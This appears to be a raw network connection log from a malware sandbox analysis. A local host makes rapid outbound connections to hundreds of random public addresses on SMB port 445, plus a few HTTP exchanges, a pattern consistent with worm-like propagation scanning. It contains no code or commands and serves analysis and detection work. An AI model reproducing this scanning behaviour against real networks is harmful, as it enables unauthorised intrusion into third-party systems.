                  Oct 13, 2022 14:53:53.698908091 CEST50388445192.168.2.445.25.175.160
                  Oct 13, 2022 14:53:53.933356047 CEST50389445192.168.2.4154.177.38.46
                  Oct 13, 2022 14:53:54.167326927 CEST50384445192.168.2.4196.185.22.154
                  Oct 13, 2022 14:53:54.168273926 CEST50390445192.168.2.478.179.132.237
                  Oct 13, 2022 14:53:54.198709965 CEST50372445192.168.2.459.190.11.30
                  Oct 13, 2022 14:53:54.370918036 CEST50391445192.168.2.442.184.251.22
                  Oct 13, 2022 14:53:54.471458912 CEST4455037259.190.11.30192.168.2.4
                  Oct 13, 2022 14:53:54.535624981 CEST44550384196.185.22.154192.168.2.4
                  Oct 13, 2022 14:53:54.543158054 CEST50392445192.168.2.482.53.140.213
                  Oct 13, 2022 14:53:54.543318987 CEST50393445192.168.2.478.31.6.236
                  Oct 13, 2022 14:53:54.544365883 CEST50394445192.168.2.4217.225.138.44
                  Oct 13, 2022 14:53:54.544532061 CEST50395445192.168.2.435.33.185.247
                  Oct 13, 2022 14:53:54.544631958 CEST50396445192.168.2.423.191.37.242
                  Oct 13, 2022 14:53:54.544730902 CEST50397445192.168.2.426.165.201.55
                  Oct 13, 2022 14:53:54.552233934 CEST50398445192.168.2.420.142.75.170
                  Oct 13, 2022 14:53:54.552268982 CEST50399445192.168.2.49.187.219.152
                  Oct 13, 2022 14:53:54.552498102 CEST50400445192.168.2.4121.12.195.5
                  Oct 13, 2022 14:53:54.554400921 CEST50401445192.168.2.4129.253.81.74
                  Oct 13, 2022 14:53:54.554444075 CEST50402445192.168.2.449.158.206.88
                  Oct 13, 2022 14:53:54.554739952 CEST50403445192.168.2.442.166.78.155
                  Oct 13, 2022 14:53:54.554811001 CEST50404445192.168.2.425.55.180.222
                  Oct 13, 2022 14:53:54.554838896 CEST50405445192.168.2.4105.226.105.35
                  Oct 13, 2022 14:53:54.554917097 CEST50406445192.168.2.4179.163.112.2
                  Oct 13, 2022 14:53:54.574289083 CEST50407445192.168.2.4130.77.51.223
                  Oct 13, 2022 14:53:54.589557886 CEST50408445192.168.2.464.252.217.82
                  Oct 13, 2022 14:53:54.667655945 CEST50409445192.168.2.432.95.242.245
                  Oct 13, 2022 14:53:54.824614048 CEST50410445192.168.2.427.37.117.60
                  Oct 13, 2022 14:53:55.058721066 CEST50411445192.168.2.4114.238.83.136
                  Oct 13, 2022 14:53:55.277348042 CEST50412445192.168.2.420.121.130.198
                  Oct 13, 2022 14:53:55.496710062 CEST50413445192.168.2.4194.45.215.59
                  Oct 13, 2022 14:53:55.497647047 CEST50414445192.168.2.4131.152.110.253
                  Oct 13, 2022 14:53:55.667903900 CEST50416445192.168.2.4170.233.25.23
                  Oct 13, 2022 14:53:55.667912006 CEST50415445192.168.2.4204.155.165.6
                  Oct 13, 2022 14:53:55.668005943 CEST50417445192.168.2.4194.52.240.128
                  Oct 13, 2022 14:53:55.668064117 CEST50418445192.168.2.4118.232.73.131
                  Oct 13, 2022 14:53:55.668119907 CEST50419445192.168.2.470.60.32.121
                  Oct 13, 2022 14:53:55.668153048 CEST50420445192.168.2.47.81.159.249
                  Oct 13, 2022 14:53:55.668195963 CEST50421445192.168.2.4111.250.93.80
                  Oct 13, 2022 14:53:55.668294907 CEST50423445192.168.2.4218.163.96.80
                  Oct 13, 2022 14:53:55.668314934 CEST50422445192.168.2.4136.6.119.21
                  Oct 13, 2022 14:53:55.670232058 CEST50424445192.168.2.462.195.84.201
                  Oct 13, 2022 14:53:55.670394897 CEST50426445192.168.2.448.88.186.25
                  Oct 13, 2022 14:53:55.670397043 CEST50425445192.168.2.4168.73.169.137
                  Oct 13, 2022 14:53:55.670423031 CEST50427445192.168.2.43.91.232.195
                  Oct 13, 2022 14:53:55.670464993 CEST50428445192.168.2.4125.129.134.251
                  Oct 13, 2022 14:53:55.670561075 CEST50429445192.168.2.469.221.41.5
                  Oct 13, 2022 14:53:55.699374914 CEST50430445192.168.2.4182.219.196.244
                  Oct 13, 2022 14:53:55.699913025 CEST50431445192.168.2.4147.107.107.254
                  Oct 13, 2022 14:53:55.706654072 CEST8049692178.79.225.0192.168.2.4
                  Oct 13, 2022 14:53:55.706826925 CEST4969280192.168.2.4178.79.225.0
                  Oct 13, 2022 14:53:55.706914902 CEST4969280192.168.2.4178.79.225.0
                  Oct 13, 2022 14:53:55.722207069 CEST8049692178.79.225.0192.168.2.4
                  Oct 13, 2022 14:53:55.767610073 CEST8049693178.79.225.0192.168.2.4
                  Oct 13, 2022 14:53:55.767797947 CEST4969380192.168.2.4178.79.225.0
                  Oct 13, 2022 14:53:55.770992994 CEST4969380192.168.2.4178.79.225.0
                  Oct 13, 2022 14:53:55.777127028 CEST50432445192.168.2.4166.234.157.219
                  Oct 13, 2022 14:53:55.786134958 CEST8049693178.79.225.0192.168.2.4
                  Oct 13, 2022 14:53:55.824820042 CEST4969480192.168.2.4178.79.225.0
                  Oct 13, 2022 14:53:55.840282917 CEST8049694178.79.225.0192.168.2.4
                  Oct 13, 2022 14:53:55.840318918 CEST8049694178.79.225.0192.168.2.4
                  Oct 13, 2022 14:53:55.840595961 CEST4969480192.168.2.4178.79.225.0
                  Oct 13, 2022 14:53:55.953445911 CEST50433445192.168.2.418.43.87.160
                  Oct 13, 2022 14:53:56.184786081 CEST50434445192.168.2.4106.33.96.205
                  Oct 13, 2022 14:53:56.387748957 CEST50435445192.168.2.4131.125.183.229
                  Oct 13, 2022 14:53:56.621299982 CEST50436445192.168.2.4216.9.72.48
                  Oct 13, 2022 14:53:56.621539116 CEST50437445192.168.2.4152.206.81.195
                  Oct 13, 2022 14:53:56.793612003 CEST50438445192.168.2.472.112.88.196
                  Oct 13, 2022 14:53:56.794096947 CEST50439445192.168.2.480.168.177.161
                  Oct 13, 2022 14:53:56.794527054 CEST50440445192.168.2.442.196.40.47
                  Oct 13, 2022 14:53:56.795123100 CEST50441445192.168.2.427.68.168.127
                  Oct 13, 2022 14:53:56.795723915 CEST50442445192.168.2.4145.164.55.223
                  Oct 13, 2022 14:53:56.796294928 CEST50443445192.168.2.4184.113.158.197
                  Oct 13, 2022 14:53:56.796485901 CEST50444445192.168.2.4205.99.205.22
                  Oct 13, 2022 14:53:56.796566963 CEST50445445192.168.2.453.166.37.165
                  Oct 13, 2022 14:53:56.796655893 CEST50446445192.168.2.424.67.27.75
                  Oct 13, 2022 14:53:56.796878099 CEST50447445192.168.2.4105.185.237.167
                  Oct 13, 2022 14:53:56.797071934 CEST50448445192.168.2.448.95.103.115
                  Oct 13, 2022 14:53:56.797178984 CEST50449445192.168.2.4156.204.89.74
                  Oct 13, 2022 14:53:56.797303915 CEST50450445192.168.2.4151.209.206.52
                  Oct 13, 2022 14:53:56.797372103 CEST50451445192.168.2.4167.114.237.37
                  Oct 13, 2022 14:53:56.797630072 CEST50452445192.168.2.485.167.45.87
                  Oct 13, 2022 14:53:56.824620962 CEST50453445192.168.2.4138.4.179.34
                  Oct 13, 2022 14:53:56.826149940 CEST50454445192.168.2.466.1.100.166
                  Oct 13, 2022 14:53:56.886636972 CEST50455445192.168.2.4158.12.69.165
                  Oct 13, 2022 14:53:57.081300974 CEST4455044127.68.168.127192.168.2.4
                  Oct 13, 2022 14:53:57.101370096 CEST50456445192.168.2.4146.4.59.98
                  Oct 13, 2022 14:53:57.313671112 CEST50457445192.168.2.4164.126.63.28
                  Oct 13, 2022 14:53:57.512370110 CEST50458445192.168.2.4186.124.28.84
                  Oct 13, 2022 14:53:57.513257027 CEST50459445192.168.2.4130.201.97.30
                  Oct 13, 2022 14:53:57.589560032 CEST50441445192.168.2.427.68.168.127
                  Oct 13, 2022 14:53:57.731005907 CEST50460445192.168.2.4163.161.154.162
                  Oct 13, 2022 14:53:57.731178999 CEST50461445192.168.2.428.83.90.152
                  Oct 13, 2022 14:53:57.876861095 CEST4455044127.68.168.127192.168.2.4
                  Oct 13, 2022 14:53:57.902446985 CEST50462445192.168.2.417.215.187.173
                  Oct 13, 2022 14:53:57.902460098 CEST50463445192.168.2.467.51.46.157
                  Oct 13, 2022 14:53:57.902653933 CEST50464445192.168.2.4198.215.59.100
                  Oct 13, 2022 14:53:57.902674913 CEST50465445192.168.2.4155.186.73.154
                  Oct 13, 2022 14:53:57.902801037 CEST50466445192.168.2.4167.31.225.106
                  Oct 13, 2022 14:53:57.902941942 CEST50467445192.168.2.4209.238.233.230
                  Oct 13, 2022 14:53:57.903038025 CEST50468445192.168.2.448.218.32.136
                  Oct 13, 2022 14:53:57.903100967 CEST50469445192.168.2.4189.145.159.184
                  Oct 13, 2022 14:53:57.903175116 CEST50470445192.168.2.481.115.56.0
                  Oct 13, 2022 14:53:57.905699015 CEST50471445192.168.2.481.199.37.49
                  Oct 13, 2022 14:53:57.905816078 CEST50472445192.168.2.475.197.105.185
                  Oct 13, 2022 14:53:57.905824900 CEST50473445192.168.2.462.62.11.7
                  Oct 13, 2022 14:53:57.905908108 CEST50474445192.168.2.493.18.225.220
                  Oct 13, 2022 14:53:57.905936003 CEST50475445192.168.2.4175.183.85.144
                  Oct 13, 2022 14:53:57.906018972 CEST50476445192.168.2.4162.14.227.235
                  Oct 13, 2022 14:53:57.934422970 CEST50477445192.168.2.481.17.208.31
                  Oct 13, 2022 14:53:57.934645891 CEST50478445192.168.2.4202.206.122.238
                  Oct 13, 2022 14:53:57.996592045 CEST50479445192.168.2.49.6.60.46
                  Oct 13, 2022 14:53:58.210635900 CEST44550475175.183.85.144192.168.2.4
                  Oct 13, 2022 14:53:58.215353966 CEST50480445192.168.2.4211.151.165.7
                  Oct 13, 2022 14:53:58.434216022 CEST50481445192.168.2.490.15.253.93
                  Oct 13, 2022 14:53:58.621217966 CEST50482445192.168.2.423.218.171.187
                  Oct 13, 2022 14:53:58.621260881 CEST50483445192.168.2.462.33.192.252
                  Oct 13, 2022 14:53:58.718341112 CEST50475445192.168.2.4175.183.85.144
                  Oct 13, 2022 14:53:58.841195107 CEST50484445192.168.2.4108.136.200.195
                  Oct 13, 2022 14:53:58.841567993 CEST50485445192.168.2.4138.121.90.53
                  Oct 13, 2022 14:53:59.016907930 CEST44550475175.183.85.144192.168.2.4
                  Oct 13, 2022 14:53:59.028101921 CEST50486445192.168.2.47.242.81.84
                  Oct 13, 2022 14:53:59.028271914 CEST50487445192.168.2.459.125.173.27
                  Oct 13, 2022 14:53:59.028476954 CEST50488445192.168.2.4123.153.105.130
                  Oct 13, 2022 14:53:59.028616905 CEST50489445192.168.2.4158.243.113.79
                  Oct 13, 2022 14:53:59.028743029 CEST50490445192.168.2.425.16.81.248
                  Oct 13, 2022 14:53:59.028886080 CEST50491445192.168.2.4130.52.70.187
                  Oct 13, 2022 14:53:59.028994083 CEST50492445192.168.2.4173.125.235.18
                  Oct 13, 2022 14:53:59.029109001 CEST50493445192.168.2.49.163.21.141
                  Oct 13, 2022 14:53:59.029216051 CEST50494445192.168.2.4125.228.150.159
                  Oct 13, 2022 14:53:59.029988050 CEST50495445192.168.2.4172.74.117.128
                  Oct 13, 2022 14:53:59.030819893 CEST50496445192.168.2.423.84.100.135
                  Oct 13, 2022 14:53:59.031846046 CEST50497445192.168.2.4103.21.90.241
                  Oct 13, 2022 14:53:59.032665014 CEST50498445192.168.2.419.192.212.250
                  Oct 13, 2022 14:53:59.033504963 CEST50499445192.168.2.4129.118.138.150
                  Oct 13, 2022 14:53:59.034311056 CEST50500445192.168.2.4211.40.27.209
                  Oct 13, 2022 14:53:59.050774097 CEST50501445192.168.2.4137.244.131.86
                  Oct 13, 2022 14:53:59.051289082 CEST50502445192.168.2.461.210.242.163
                  Oct 13, 2022 14:53:59.105813980 CEST50503445192.168.2.426.248.82.187
                  Oct 13, 2022 14:53:59.324587107 CEST50504445192.168.2.4142.113.50.89
                  Oct 13, 2022 14:53:59.529082060 CEST50505445192.168.2.4179.22.42.203
                  Oct 13, 2022 14:53:59.559107065 CEST50506445192.168.2.475.166.188.216
                  Oct 13, 2022 14:53:59.746400118 CEST50507445192.168.2.4215.242.81.150
                  Oct 13, 2022 14:53:59.746784925 CEST50508445192.168.2.4197.203.26.10
                  Oct 13, 2022 14:53:59.965311050 CEST50509445192.168.2.4129.187.211.15
                  Oct 13, 2022 14:53:59.965570927 CEST50510445192.168.2.4197.82.202.181
                  Oct 13, 2022 14:54:00.152513027 CEST50511445192.168.2.4150.222.73.142
                  Oct 13, 2022 14:54:00.152579069 CEST50512445192.168.2.4197.9.122.188
                  Oct 13, 2022 14:54:00.152762890 CEST50513445192.168.2.4150.253.211.189
                  Oct 13, 2022 14:54:00.152950048 CEST50514445192.168.2.4204.201.27.149
                  Oct 13, 2022 14:54:00.152955055 CEST50516445192.168.2.4171.155.78.236
                  Oct 13, 2022 14:54:00.152973890 CEST50515445192.168.2.463.56.99.249
                  Oct 13, 2022 14:54:00.153104067 CEST50517445192.168.2.4175.93.61.77
                  Oct 13, 2022 14:54:00.153150082 CEST50518445192.168.2.435.110.185.61
                  Oct 13, 2022 14:54:00.153225899 CEST50519445192.168.2.4222.87.233.171
                  Oct 13, 2022 14:54:00.153300047 CEST50520445192.168.2.4189.15.120.152
                  Oct 13, 2022 14:54:00.155915022 CEST50521445192.168.2.495.147.111.224
                  Oct 13, 2022 14:54:00.156023026 CEST50522445192.168.2.4150.102.28.238
                  Oct 13, 2022 14:54:00.156189919 CEST50523445192.168.2.4186.21.16.214
                  Oct 13, 2022 14:54:00.156233072 CEST50524445192.168.2.4189.249.234.185
                  Oct 13, 2022 14:54:00.156290054 CEST50525445192.168.2.4175.232.222.151
                  Oct 13, 2022 14:54:00.156323910 CEST50526445192.168.2.4119.96.216.156
                  Oct 13, 2022 14:54:00.156371117 CEST50527445192.168.2.4137.54.8.96
                  Oct 13, 2022 14:54:00.215012074 CEST50528445192.168.2.43.191.182.173
                  Oct 13, 2022 14:54:00.450186014 CEST50529445192.168.2.4186.31.150.143
                  Oct 13, 2022 14:54:00.652806997 CEST50530445192.168.2.4180.19.207.181
                  Oct 13, 2022 14:54:00.689343929 CEST50531445192.168.2.4182.187.136.195
                  Oct 13, 2022 14:54:00.871256113 CEST50532445192.168.2.4167.126.3.57
                  Oct 13, 2022 14:54:00.871416092 CEST50533445192.168.2.4106.188.146.8
                  Oct 13, 2022 14:54:01.074673891 CEST50535445192.168.2.4217.121.141.34
                  Oct 13, 2022 14:54:01.074700117 CEST50534445192.168.2.4117.121.206.47
                  Oct 13, 2022 14:54:01.262166977 CEST50536445192.168.2.498.22.124.143
                  Oct 13, 2022 14:54:01.262521982 CEST50537445192.168.2.410.58.88.161
                  Oct 13, 2022 14:54:01.262622118 CEST50538445192.168.2.420.70.120.102
                  Oct 13, 2022 14:54:01.262722969 CEST50539445192.168.2.450.28.38.156
                  Oct 13, 2022 14:54:01.262836933 CEST50540445192.168.2.4139.137.176.197
                  Oct 13, 2022 14:54:01.263010025 CEST50541445192.168.2.4165.73.36.44
                  Oct 13, 2022 14:54:01.263207912 CEST50542445192.168.2.496.26.28.199
                  Oct 13, 2022 14:54:01.263309956 CEST50543445192.168.2.4136.9.180.57
                  Oct 13, 2022 14:54:01.263570070 CEST50544445192.168.2.473.39.74.170
                  Oct 13, 2022 14:54:01.263674974 CEST50545445192.168.2.4152.249.138.248
                  Oct 13, 2022 14:54:01.264401913 CEST50546445192.168.2.4109.25.12.174
                  Oct 13, 2022 14:54:01.264966011 CEST50547445192.168.2.4165.182.58.64
                  Oct 13, 2022 14:54:01.265506983 CEST50548445192.168.2.484.221.53.68
                  Oct 13, 2022 14:54:01.266177893 CEST50549445192.168.2.4150.126.67.137
                  Oct 13, 2022 14:54:01.266736031 CEST50550445192.168.2.4193.249.54.43
                  Oct 13, 2022 14:54:01.267342091 CEST50551445192.168.2.4180.117.138.179
                  Oct 13, 2022 14:54:01.267959118 CEST50552445192.168.2.466.65.12.202
                  Oct 13, 2022 14:54:01.348843098 CEST50553445192.168.2.4125.169.93.242
                  Oct 13, 2022 14:54:01.414211988 CEST4455055266.65.12.202192.168.2.4
                  Oct 13, 2022 14:54:01.547108889 CEST50554445192.168.2.4215.87.80.243
                  Oct 13, 2022 14:54:01.574475050 CEST50555445192.168.2.4208.45.6.32
                  Oct 13, 2022 14:54:01.789645910 CEST50556445192.168.2.4197.189.43.47
                  Oct 13, 2022 14:54:01.808914900 CEST50557445192.168.2.449.9.121.70
                  Oct 13, 2022 14:54:01.918013096 CEST50552445192.168.2.466.65.12.202
                  Oct 13, 2022 14:54:01.981391907 CEST50559445192.168.2.4112.150.146.154
                  Oct 13, 2022 14:54:01.981432915 CEST50558445192.168.2.4121.157.245.135
                  Oct 13, 2022 14:54:02.064459085 CEST4455055266.65.12.202192.168.2.4
                  Oct 13, 2022 14:54:02.200432062 CEST50560445192.168.2.410.216.236.168
                  Oct 13, 2022 14:54:02.200731039 CEST50561445192.168.2.474.60.19.209
                  Oct 13, 2022 14:54:02.372059107 CEST50562445192.168.2.4187.164.50.72
                  Oct 13, 2022 14:54:02.372147083 CEST50563445192.168.2.453.50.206.81
                  Oct 13, 2022 14:54:02.372258902 CEST50564445192.168.2.45.84.193.25
                  Oct 13, 2022 14:54:02.372354984 CEST50565445192.168.2.444.87.252.171
                  Oct 13, 2022 14:54:02.372453928 CEST50566445192.168.2.4164.70.83.138
                  Oct 13, 2022 14:54:02.372541904 CEST50567445192.168.2.434.89.187.226
                  Oct 13, 2022 14:54:02.372636080 CEST50568445192.168.2.431.212.142.140
                  Oct 13, 2022 14:54:02.372729063 CEST50569445192.168.2.4130.53.6.15
                  Oct 13, 2022 14:54:02.372817039 CEST50570445192.168.2.427.14.139.251
                  Oct 13, 2022 14:54:02.372957945 CEST50571445192.168.2.491.174.124.214
                  Oct 13, 2022 14:54:02.373544931 CEST50572445192.168.2.4219.245.187.173
                  Oct 13, 2022 14:54:02.374059916 CEST50573445192.168.2.4133.13.143.223
                  Oct 13, 2022 14:54:02.374686003 CEST50574445192.168.2.4135.127.91.18
                  Oct 13, 2022 14:54:02.376084089 CEST50575445192.168.2.4128.97.107.161
                  Oct 13, 2022 14:54:02.376739979 CEST50576445192.168.2.4197.0.78.249
                  Oct 13, 2022 14:54:02.376763105 CEST50577445192.168.2.438.248.132.15
                  Oct 13, 2022 14:54:02.376842976 CEST50578445192.168.2.4209.7.151.238
                  Oct 13, 2022 14:54:02.452682972 CEST50579445192.168.2.4193.229.61.248
                  Oct 13, 2022 14:54:02.653611898 CEST50580445192.168.2.4138.47.74.250
                  Oct 13, 2022 14:54:02.684015036 CEST50581445192.168.2.498.172.152.79
                  Oct 13, 2022 14:54:02.902914047 CEST50582445192.168.2.4150.110.81.34
                  Oct 13, 2022 14:54:02.934127092 CEST50583445192.168.2.448.192.123.144
                  Oct 13, 2022 14:54:03.091660976 CEST50584445192.168.2.4137.81.115.110
                  Oct 13, 2022 14:54:03.091686010 CEST50585445192.168.2.4184.189.197.15
                  Oct 13, 2022 14:54:03.324857950 CEST50586445192.168.2.471.234.145.201
                  Oct 13, 2022 14:54:03.324991941 CEST50587445192.168.2.444.226.209.229
                  Oct 13, 2022 14:54:03.514502048 CEST50588445192.168.2.4106.14.236.197
                  Oct 13, 2022 14:54:03.514662027 CEST50589445192.168.2.442.214.133.169
                  Oct 13, 2022 14:54:03.514794111 CEST50590445192.168.2.4139.61.107.96
                  Oct 13, 2022 14:54:03.514884949 CEST50591445192.168.2.492.239.252.222
                  Oct 13, 2022 14:54:03.514990091 CEST50592445192.168.2.4121.63.154.91
                  Oct 13, 2022 14:54:03.515081882 CEST50593445192.168.2.427.50.198.109
                  Oct 13, 2022 14:54:03.515249014 CEST50594445192.168.2.4218.203.144.236
                  Oct 13, 2022 14:54:03.515300035 CEST50595445192.168.2.4177.76.231.218
                  Oct 13, 2022 14:54:03.515414000 CEST50596445192.168.2.449.187.186.4
                  Oct 13, 2022 14:54:03.515952110 CEST50597445192.168.2.438.110.99.72
                  Oct 13, 2022 14:54:03.516591072 CEST50598445192.168.2.478.47.82.229
                  Oct 13, 2022 14:54:03.518107891 CEST50599445192.168.2.4104.41.133.19
                  Oct 13, 2022 14:54:03.519001007 CEST50600445192.168.2.4161.37.90.239
                  Oct 13, 2022 14:54:03.519812107 CEST50601445192.168.2.4153.235.219.38
                  Oct 13, 2022 14:54:03.530113935 CEST50602445192.168.2.490.220.225.232
                  Oct 13, 2022 14:54:03.546412945 CEST50603445192.168.2.4222.81.30.143
                  Oct 13, 2022 14:54:03.547175884 CEST50604445192.168.2.4102.37.244.218
                  Oct 13, 2022 14:54:03.559822083 CEST50605445192.168.2.482.205.130.143
                  Oct 13, 2022 14:54:03.575716019 CEST50606445192.168.2.421.81.5.21
                  Oct 13, 2022 14:54:03.577909946 CEST4455060582.205.130.143192.168.2.4
                  Oct 13, 2022 14:54:03.783405066 CEST50607445192.168.2.4153.180.80.148
                  Oct 13, 2022 14:54:03.809096098 CEST50608445192.168.2.419.56.37.230
                  Oct 13, 2022 14:54:04.028043985 CEST50609445192.168.2.46.73.131.246
                  Oct 13, 2022 14:54:04.059686899 CEST50610445192.168.2.490.129.134.29
                  Oct 13, 2022 14:54:04.090044022 CEST50605445192.168.2.482.205.130.143
                  Oct 13, 2022 14:54:04.108331919 CEST4455060582.205.130.143192.168.2.4
                  Oct 13, 2022 14:54:04.199814081 CEST50611445192.168.2.4162.151.56.207
                  Oct 13, 2022 14:54:04.199878931 CEST50612445192.168.2.4209.105.114.169
                  Oct 13, 2022 14:54:04.343151093 CEST44550611162.151.56.207192.168.2.4
                  Oct 13, 2022 14:54:04.435532093 CEST50614445192.168.2.4110.246.96.141
                  Oct 13, 2022 14:54:04.435535908 CEST50613445192.168.2.4130.55.76.231
                  Oct 13, 2022 14:54:04.622337103 CEST50615445192.168.2.4145.207.207.241
                  Oct 13, 2022 14:54:04.622498035 CEST50616445192.168.2.41.88.110.132
                  Oct 13, 2022 14:54:04.622611046 CEST50617445192.168.2.4175.190.62.148
                  Oct 13, 2022 14:54:04.622773886 CEST50618445192.168.2.4200.72.205.10
                  Oct 13, 2022 14:54:04.622916937 CEST50619445192.168.2.491.83.243.48
                  Oct 13, 2022 14:54:04.623033047 CEST50620445192.168.2.49.31.71.148
                  Oct 13, 2022 14:54:04.623148918 CEST50621445192.168.2.434.205.124.155
                  Oct 13, 2022 14:54:04.623250008 CEST50622445192.168.2.4185.206.33.141
                  Oct 13, 2022 14:54:04.623388052 CEST50623445192.168.2.4130.84.174.114
                  Oct 13, 2022 14:54:04.623492002 CEST50624445192.168.2.4101.38.50.216
                  Oct 13, 2022 14:54:04.624110937 CEST50625445192.168.2.429.32.183.72
                  Oct 13, 2022 14:54:04.624891996 CEST50626445192.168.2.449.189.27.19
                  Oct 13, 2022 14:54:04.625605106 CEST50627445192.168.2.4203.215.58.138
                  Oct 13, 2022 14:54:04.626811981 CEST50628445192.168.2.481.14.239.20
                  Oct 13, 2022 14:54:04.678251028 CEST50629445192.168.2.4207.136.193.68
                  Oct 13, 2022 14:54:04.679008007 CEST50630445192.168.2.452.72.50.217
                  Oct 13, 2022 14:54:04.680489063 CEST50631445192.168.2.4203.224.201.4
                  Oct 13, 2022 14:54:04.680773973 CEST50632445192.168.2.4137.62.221.41
                  Oct 13, 2022 14:54:04.684243917 CEST50633445192.168.2.449.202.105.33
                  Oct 13, 2022 14:54:04.855746031 CEST50611445192.168.2.4162.151.56.207
                  Oct 13, 2022 14:54:04.903021097 CEST50634445192.168.2.450.76.245.48
                  Oct 13, 2022 14:54:04.934214115 CEST50635445192.168.2.478.169.74.160
                  Oct 13, 2022 14:54:04.999262094 CEST44550611162.151.56.207192.168.2.4
                  Oct 13, 2022 14:54:05.153502941 CEST50636445192.168.2.498.145.12.152
                  Oct 13, 2022 14:54:05.186213017 CEST50637445192.168.2.4202.161.171.110
                  Oct 13, 2022 14:54:05.280134916 CEST44550601153.235.219.38192.168.2.4
                  Oct 13, 2022 14:54:05.309267998 CEST50638445192.168.2.4213.155.167.112
                  Oct 13, 2022 14:54:05.309350014 CEST50639445192.168.2.499.246.228.70
                  Oct 13, 2022 14:54:05.559973955 CEST50641445192.168.2.478.79.131.141
                  Oct 13, 2022 14:54:05.559978962 CEST50640445192.168.2.472.61.208.224
                  Oct 13, 2022 14:54:05.576191902 CEST50642445192.168.2.49.57.225.94
                  Oct 13, 2022 14:54:05.759419918 CEST50643445192.168.2.41.120.120.187
                  Oct 13, 2022 14:54:05.760101080 CEST50644445192.168.2.4178.58.186.131
                  Oct 13, 2022 14:54:05.761010885 CEST50645445192.168.2.4130.230.173.217
                  Oct 13, 2022 14:54:05.761814117 CEST50646445192.168.2.481.43.127.137
                  Oct 13, 2022 14:54:05.768863916 CEST50647445192.168.2.4177.196.232.185
                  Oct 13, 2022 14:54:05.769181967 CEST50648445192.168.2.4116.153.174.72
                  Oct 13, 2022 14:54:05.769347906 CEST50649445192.168.2.4167.121.32.220
                  Oct 13, 2022 14:54:05.769495010 CEST50650445192.168.2.4112.122.127.10
                  Oct 13, 2022 14:54:05.769599915 CEST50651445192.168.2.4112.211.114.89
                  Oct 13, 2022 14:54:05.769735098 CEST50652445192.168.2.443.111.41.235
                  Oct 13, 2022 14:54:05.769936085 CEST50653445192.168.2.4196.136.202.99
                  Oct 13, 2022 14:54:05.770144939 CEST50654445192.168.2.4118.114.180.177
                  Oct 13, 2022 14:54:05.770270109 CEST50655445192.168.2.447.175.198.50
                  Oct 13, 2022 14:54:05.770390034 CEST50656445192.168.2.4111.121.166.65
                  Oct 13, 2022 14:54:05.778270006 CEST50657445192.168.2.487.176.119.164
                  Oct 13, 2022 14:54:05.779109955 CEST50658445192.168.2.4134.190.253.205
                  Oct 13, 2022 14:54:05.779958963 CEST50659445192.168.2.4117.46.33.188
                  Oct 13, 2022 14:54:05.780798912 CEST50660445192.168.2.411.249.163.136
                  Oct 13, 2022 14:54:05.796660900 CEST50661445192.168.2.433.11.112.160
                  Oct 13, 2022 14:54:06.028429985 CEST50662445192.168.2.4221.140.241.90
                  Oct 13, 2022 14:54:06.039727926 CEST44550647177.196.232.185192.168.2.4
                  Oct 13, 2022 14:54:06.059369087 CEST50663445192.168.2.4183.197.185.85
                  Oct 13, 2022 14:54:06.278057098 CEST50664445192.168.2.4153.118.73.201
                  Oct 13, 2022 14:54:06.309514046 CEST50665445192.168.2.458.120.15.249
                  Oct 13, 2022 14:54:06.434495926 CEST50666445192.168.2.478.151.26.18
                  Oct 13, 2022 14:54:06.434681892 CEST50667445192.168.2.454.76.174.132
                  Oct 13, 2022 14:54:06.543438911 CEST50647445192.168.2.4177.196.232.185
                  Oct 13, 2022 14:54:06.684484959 CEST50668445192.168.2.432.34.158.47
                  Oct 13, 2022 14:54:06.684484959 CEST50669445192.168.2.4106.65.193.236
                  Oct 13, 2022 14:54:06.700306892 CEST50670445192.168.2.4104.58.31.150
                  Oct 13, 2022 14:54:06.840205908 CEST44550647177.196.232.185192.168.2.4
                  Oct 13, 2022 14:54:06.872620106 CEST50671445192.168.2.4117.98.212.107
                  Oct 13, 2022 14:54:06.873169899 CEST50672445192.168.2.48.78.92.212
                  Oct 13, 2022 14:54:06.873846054 CEST50673445192.168.2.4137.106.32.229
                  Oct 13, 2022 14:54:06.874326944 CEST50674445192.168.2.4178.45.140.163
                  Oct 13, 2022 14:54:06.887530088 CEST50675445192.168.2.4135.149.37.89
                  Oct 13, 2022 14:54:06.887670994 CEST50676445192.168.2.415.233.234.92
                  Oct 13, 2022 14:54:06.887789011 CEST50677445192.168.2.492.152.252.198
                  Oct 13, 2022 14:54:06.887885094 CEST50678445192.168.2.4215.165.24.142
                  Oct 13, 2022 14:54:06.887957096 CEST50679445192.168.2.428.24.123.49
                  Oct 13, 2022 14:54:06.888062954 CEST50680445192.168.2.425.73.117.174
                  Oct 13, 2022 14:54:06.888142109 CEST50681445192.168.2.432.131.89.249
                  Oct 13, 2022 14:54:06.888232946 CEST50682445192.168.2.446.72.200.238
                  Oct 13, 2022 14:54:06.888333082 CEST50683445192.168.2.4102.213.210.194
                  Oct 13, 2022 14:54:06.888396978 CEST50684445192.168.2.461.142.21.247
                  Oct 13, 2022 14:54:06.905138969 CEST50685445192.168.2.412.26.13.168
                  Oct 13, 2022 14:54:06.913053036 CEST50686445192.168.2.458.249.233.199
                  Oct 13, 2022 14:54:06.913600922 CEST50687445192.168.2.434.242.227.42
                  Oct 13, 2022 14:54:06.913902998 CEST50688445192.168.2.4178.35.164.235
                  Oct 13, 2022 14:54:06.918613911 CEST50689445192.168.2.4101.66.243.69
                  Oct 13, 2022 14:54:07.153075933 CEST50690445192.168.2.4195.55.134.48
                  Oct 13, 2022 14:54:07.184566975 CEST50691445192.168.2.4209.197.179.159
                  Oct 13, 2022 14:54:07.403563976 CEST50692445192.168.2.422.25.146.237
                  Oct 13, 2022 14:54:07.434422016 CEST50693445192.168.2.484.54.137.228
                  Oct 13, 2022 14:54:07.559633017 CEST50694445192.168.2.415.47.244.21
                  Oct 13, 2022 14:54:07.559753895 CEST50695445192.168.2.4131.6.162.178
                  Oct 13, 2022 14:54:07.597706079 CEST50696445192.168.2.4163.37.71.214
                  Oct 13, 2022 14:54:07.809324980 CEST50697445192.168.2.451.4.35.184
                  Oct 13, 2022 14:54:07.809645891 CEST50698445192.168.2.4193.199.44.30
                  Oct 13, 2022 14:54:07.809766054 CEST50699445192.168.2.4133.191.16.242
                  Oct 13, 2022 14:54:07.997164965 CEST50700445192.168.2.4178.246.183.230
                  Oct 13, 2022 14:54:08.000916004 CEST50701445192.168.2.4217.178.197.98
                  Oct 13, 2022 14:54:08.004118919 CEST50702445192.168.2.481.131.252.197
                  Oct 13, 2022 14:54:08.004311085 CEST50703445192.168.2.4196.19.30.243
                  Oct 13, 2022 14:54:08.011042118 CEST50704445192.168.2.4183.163.207.192
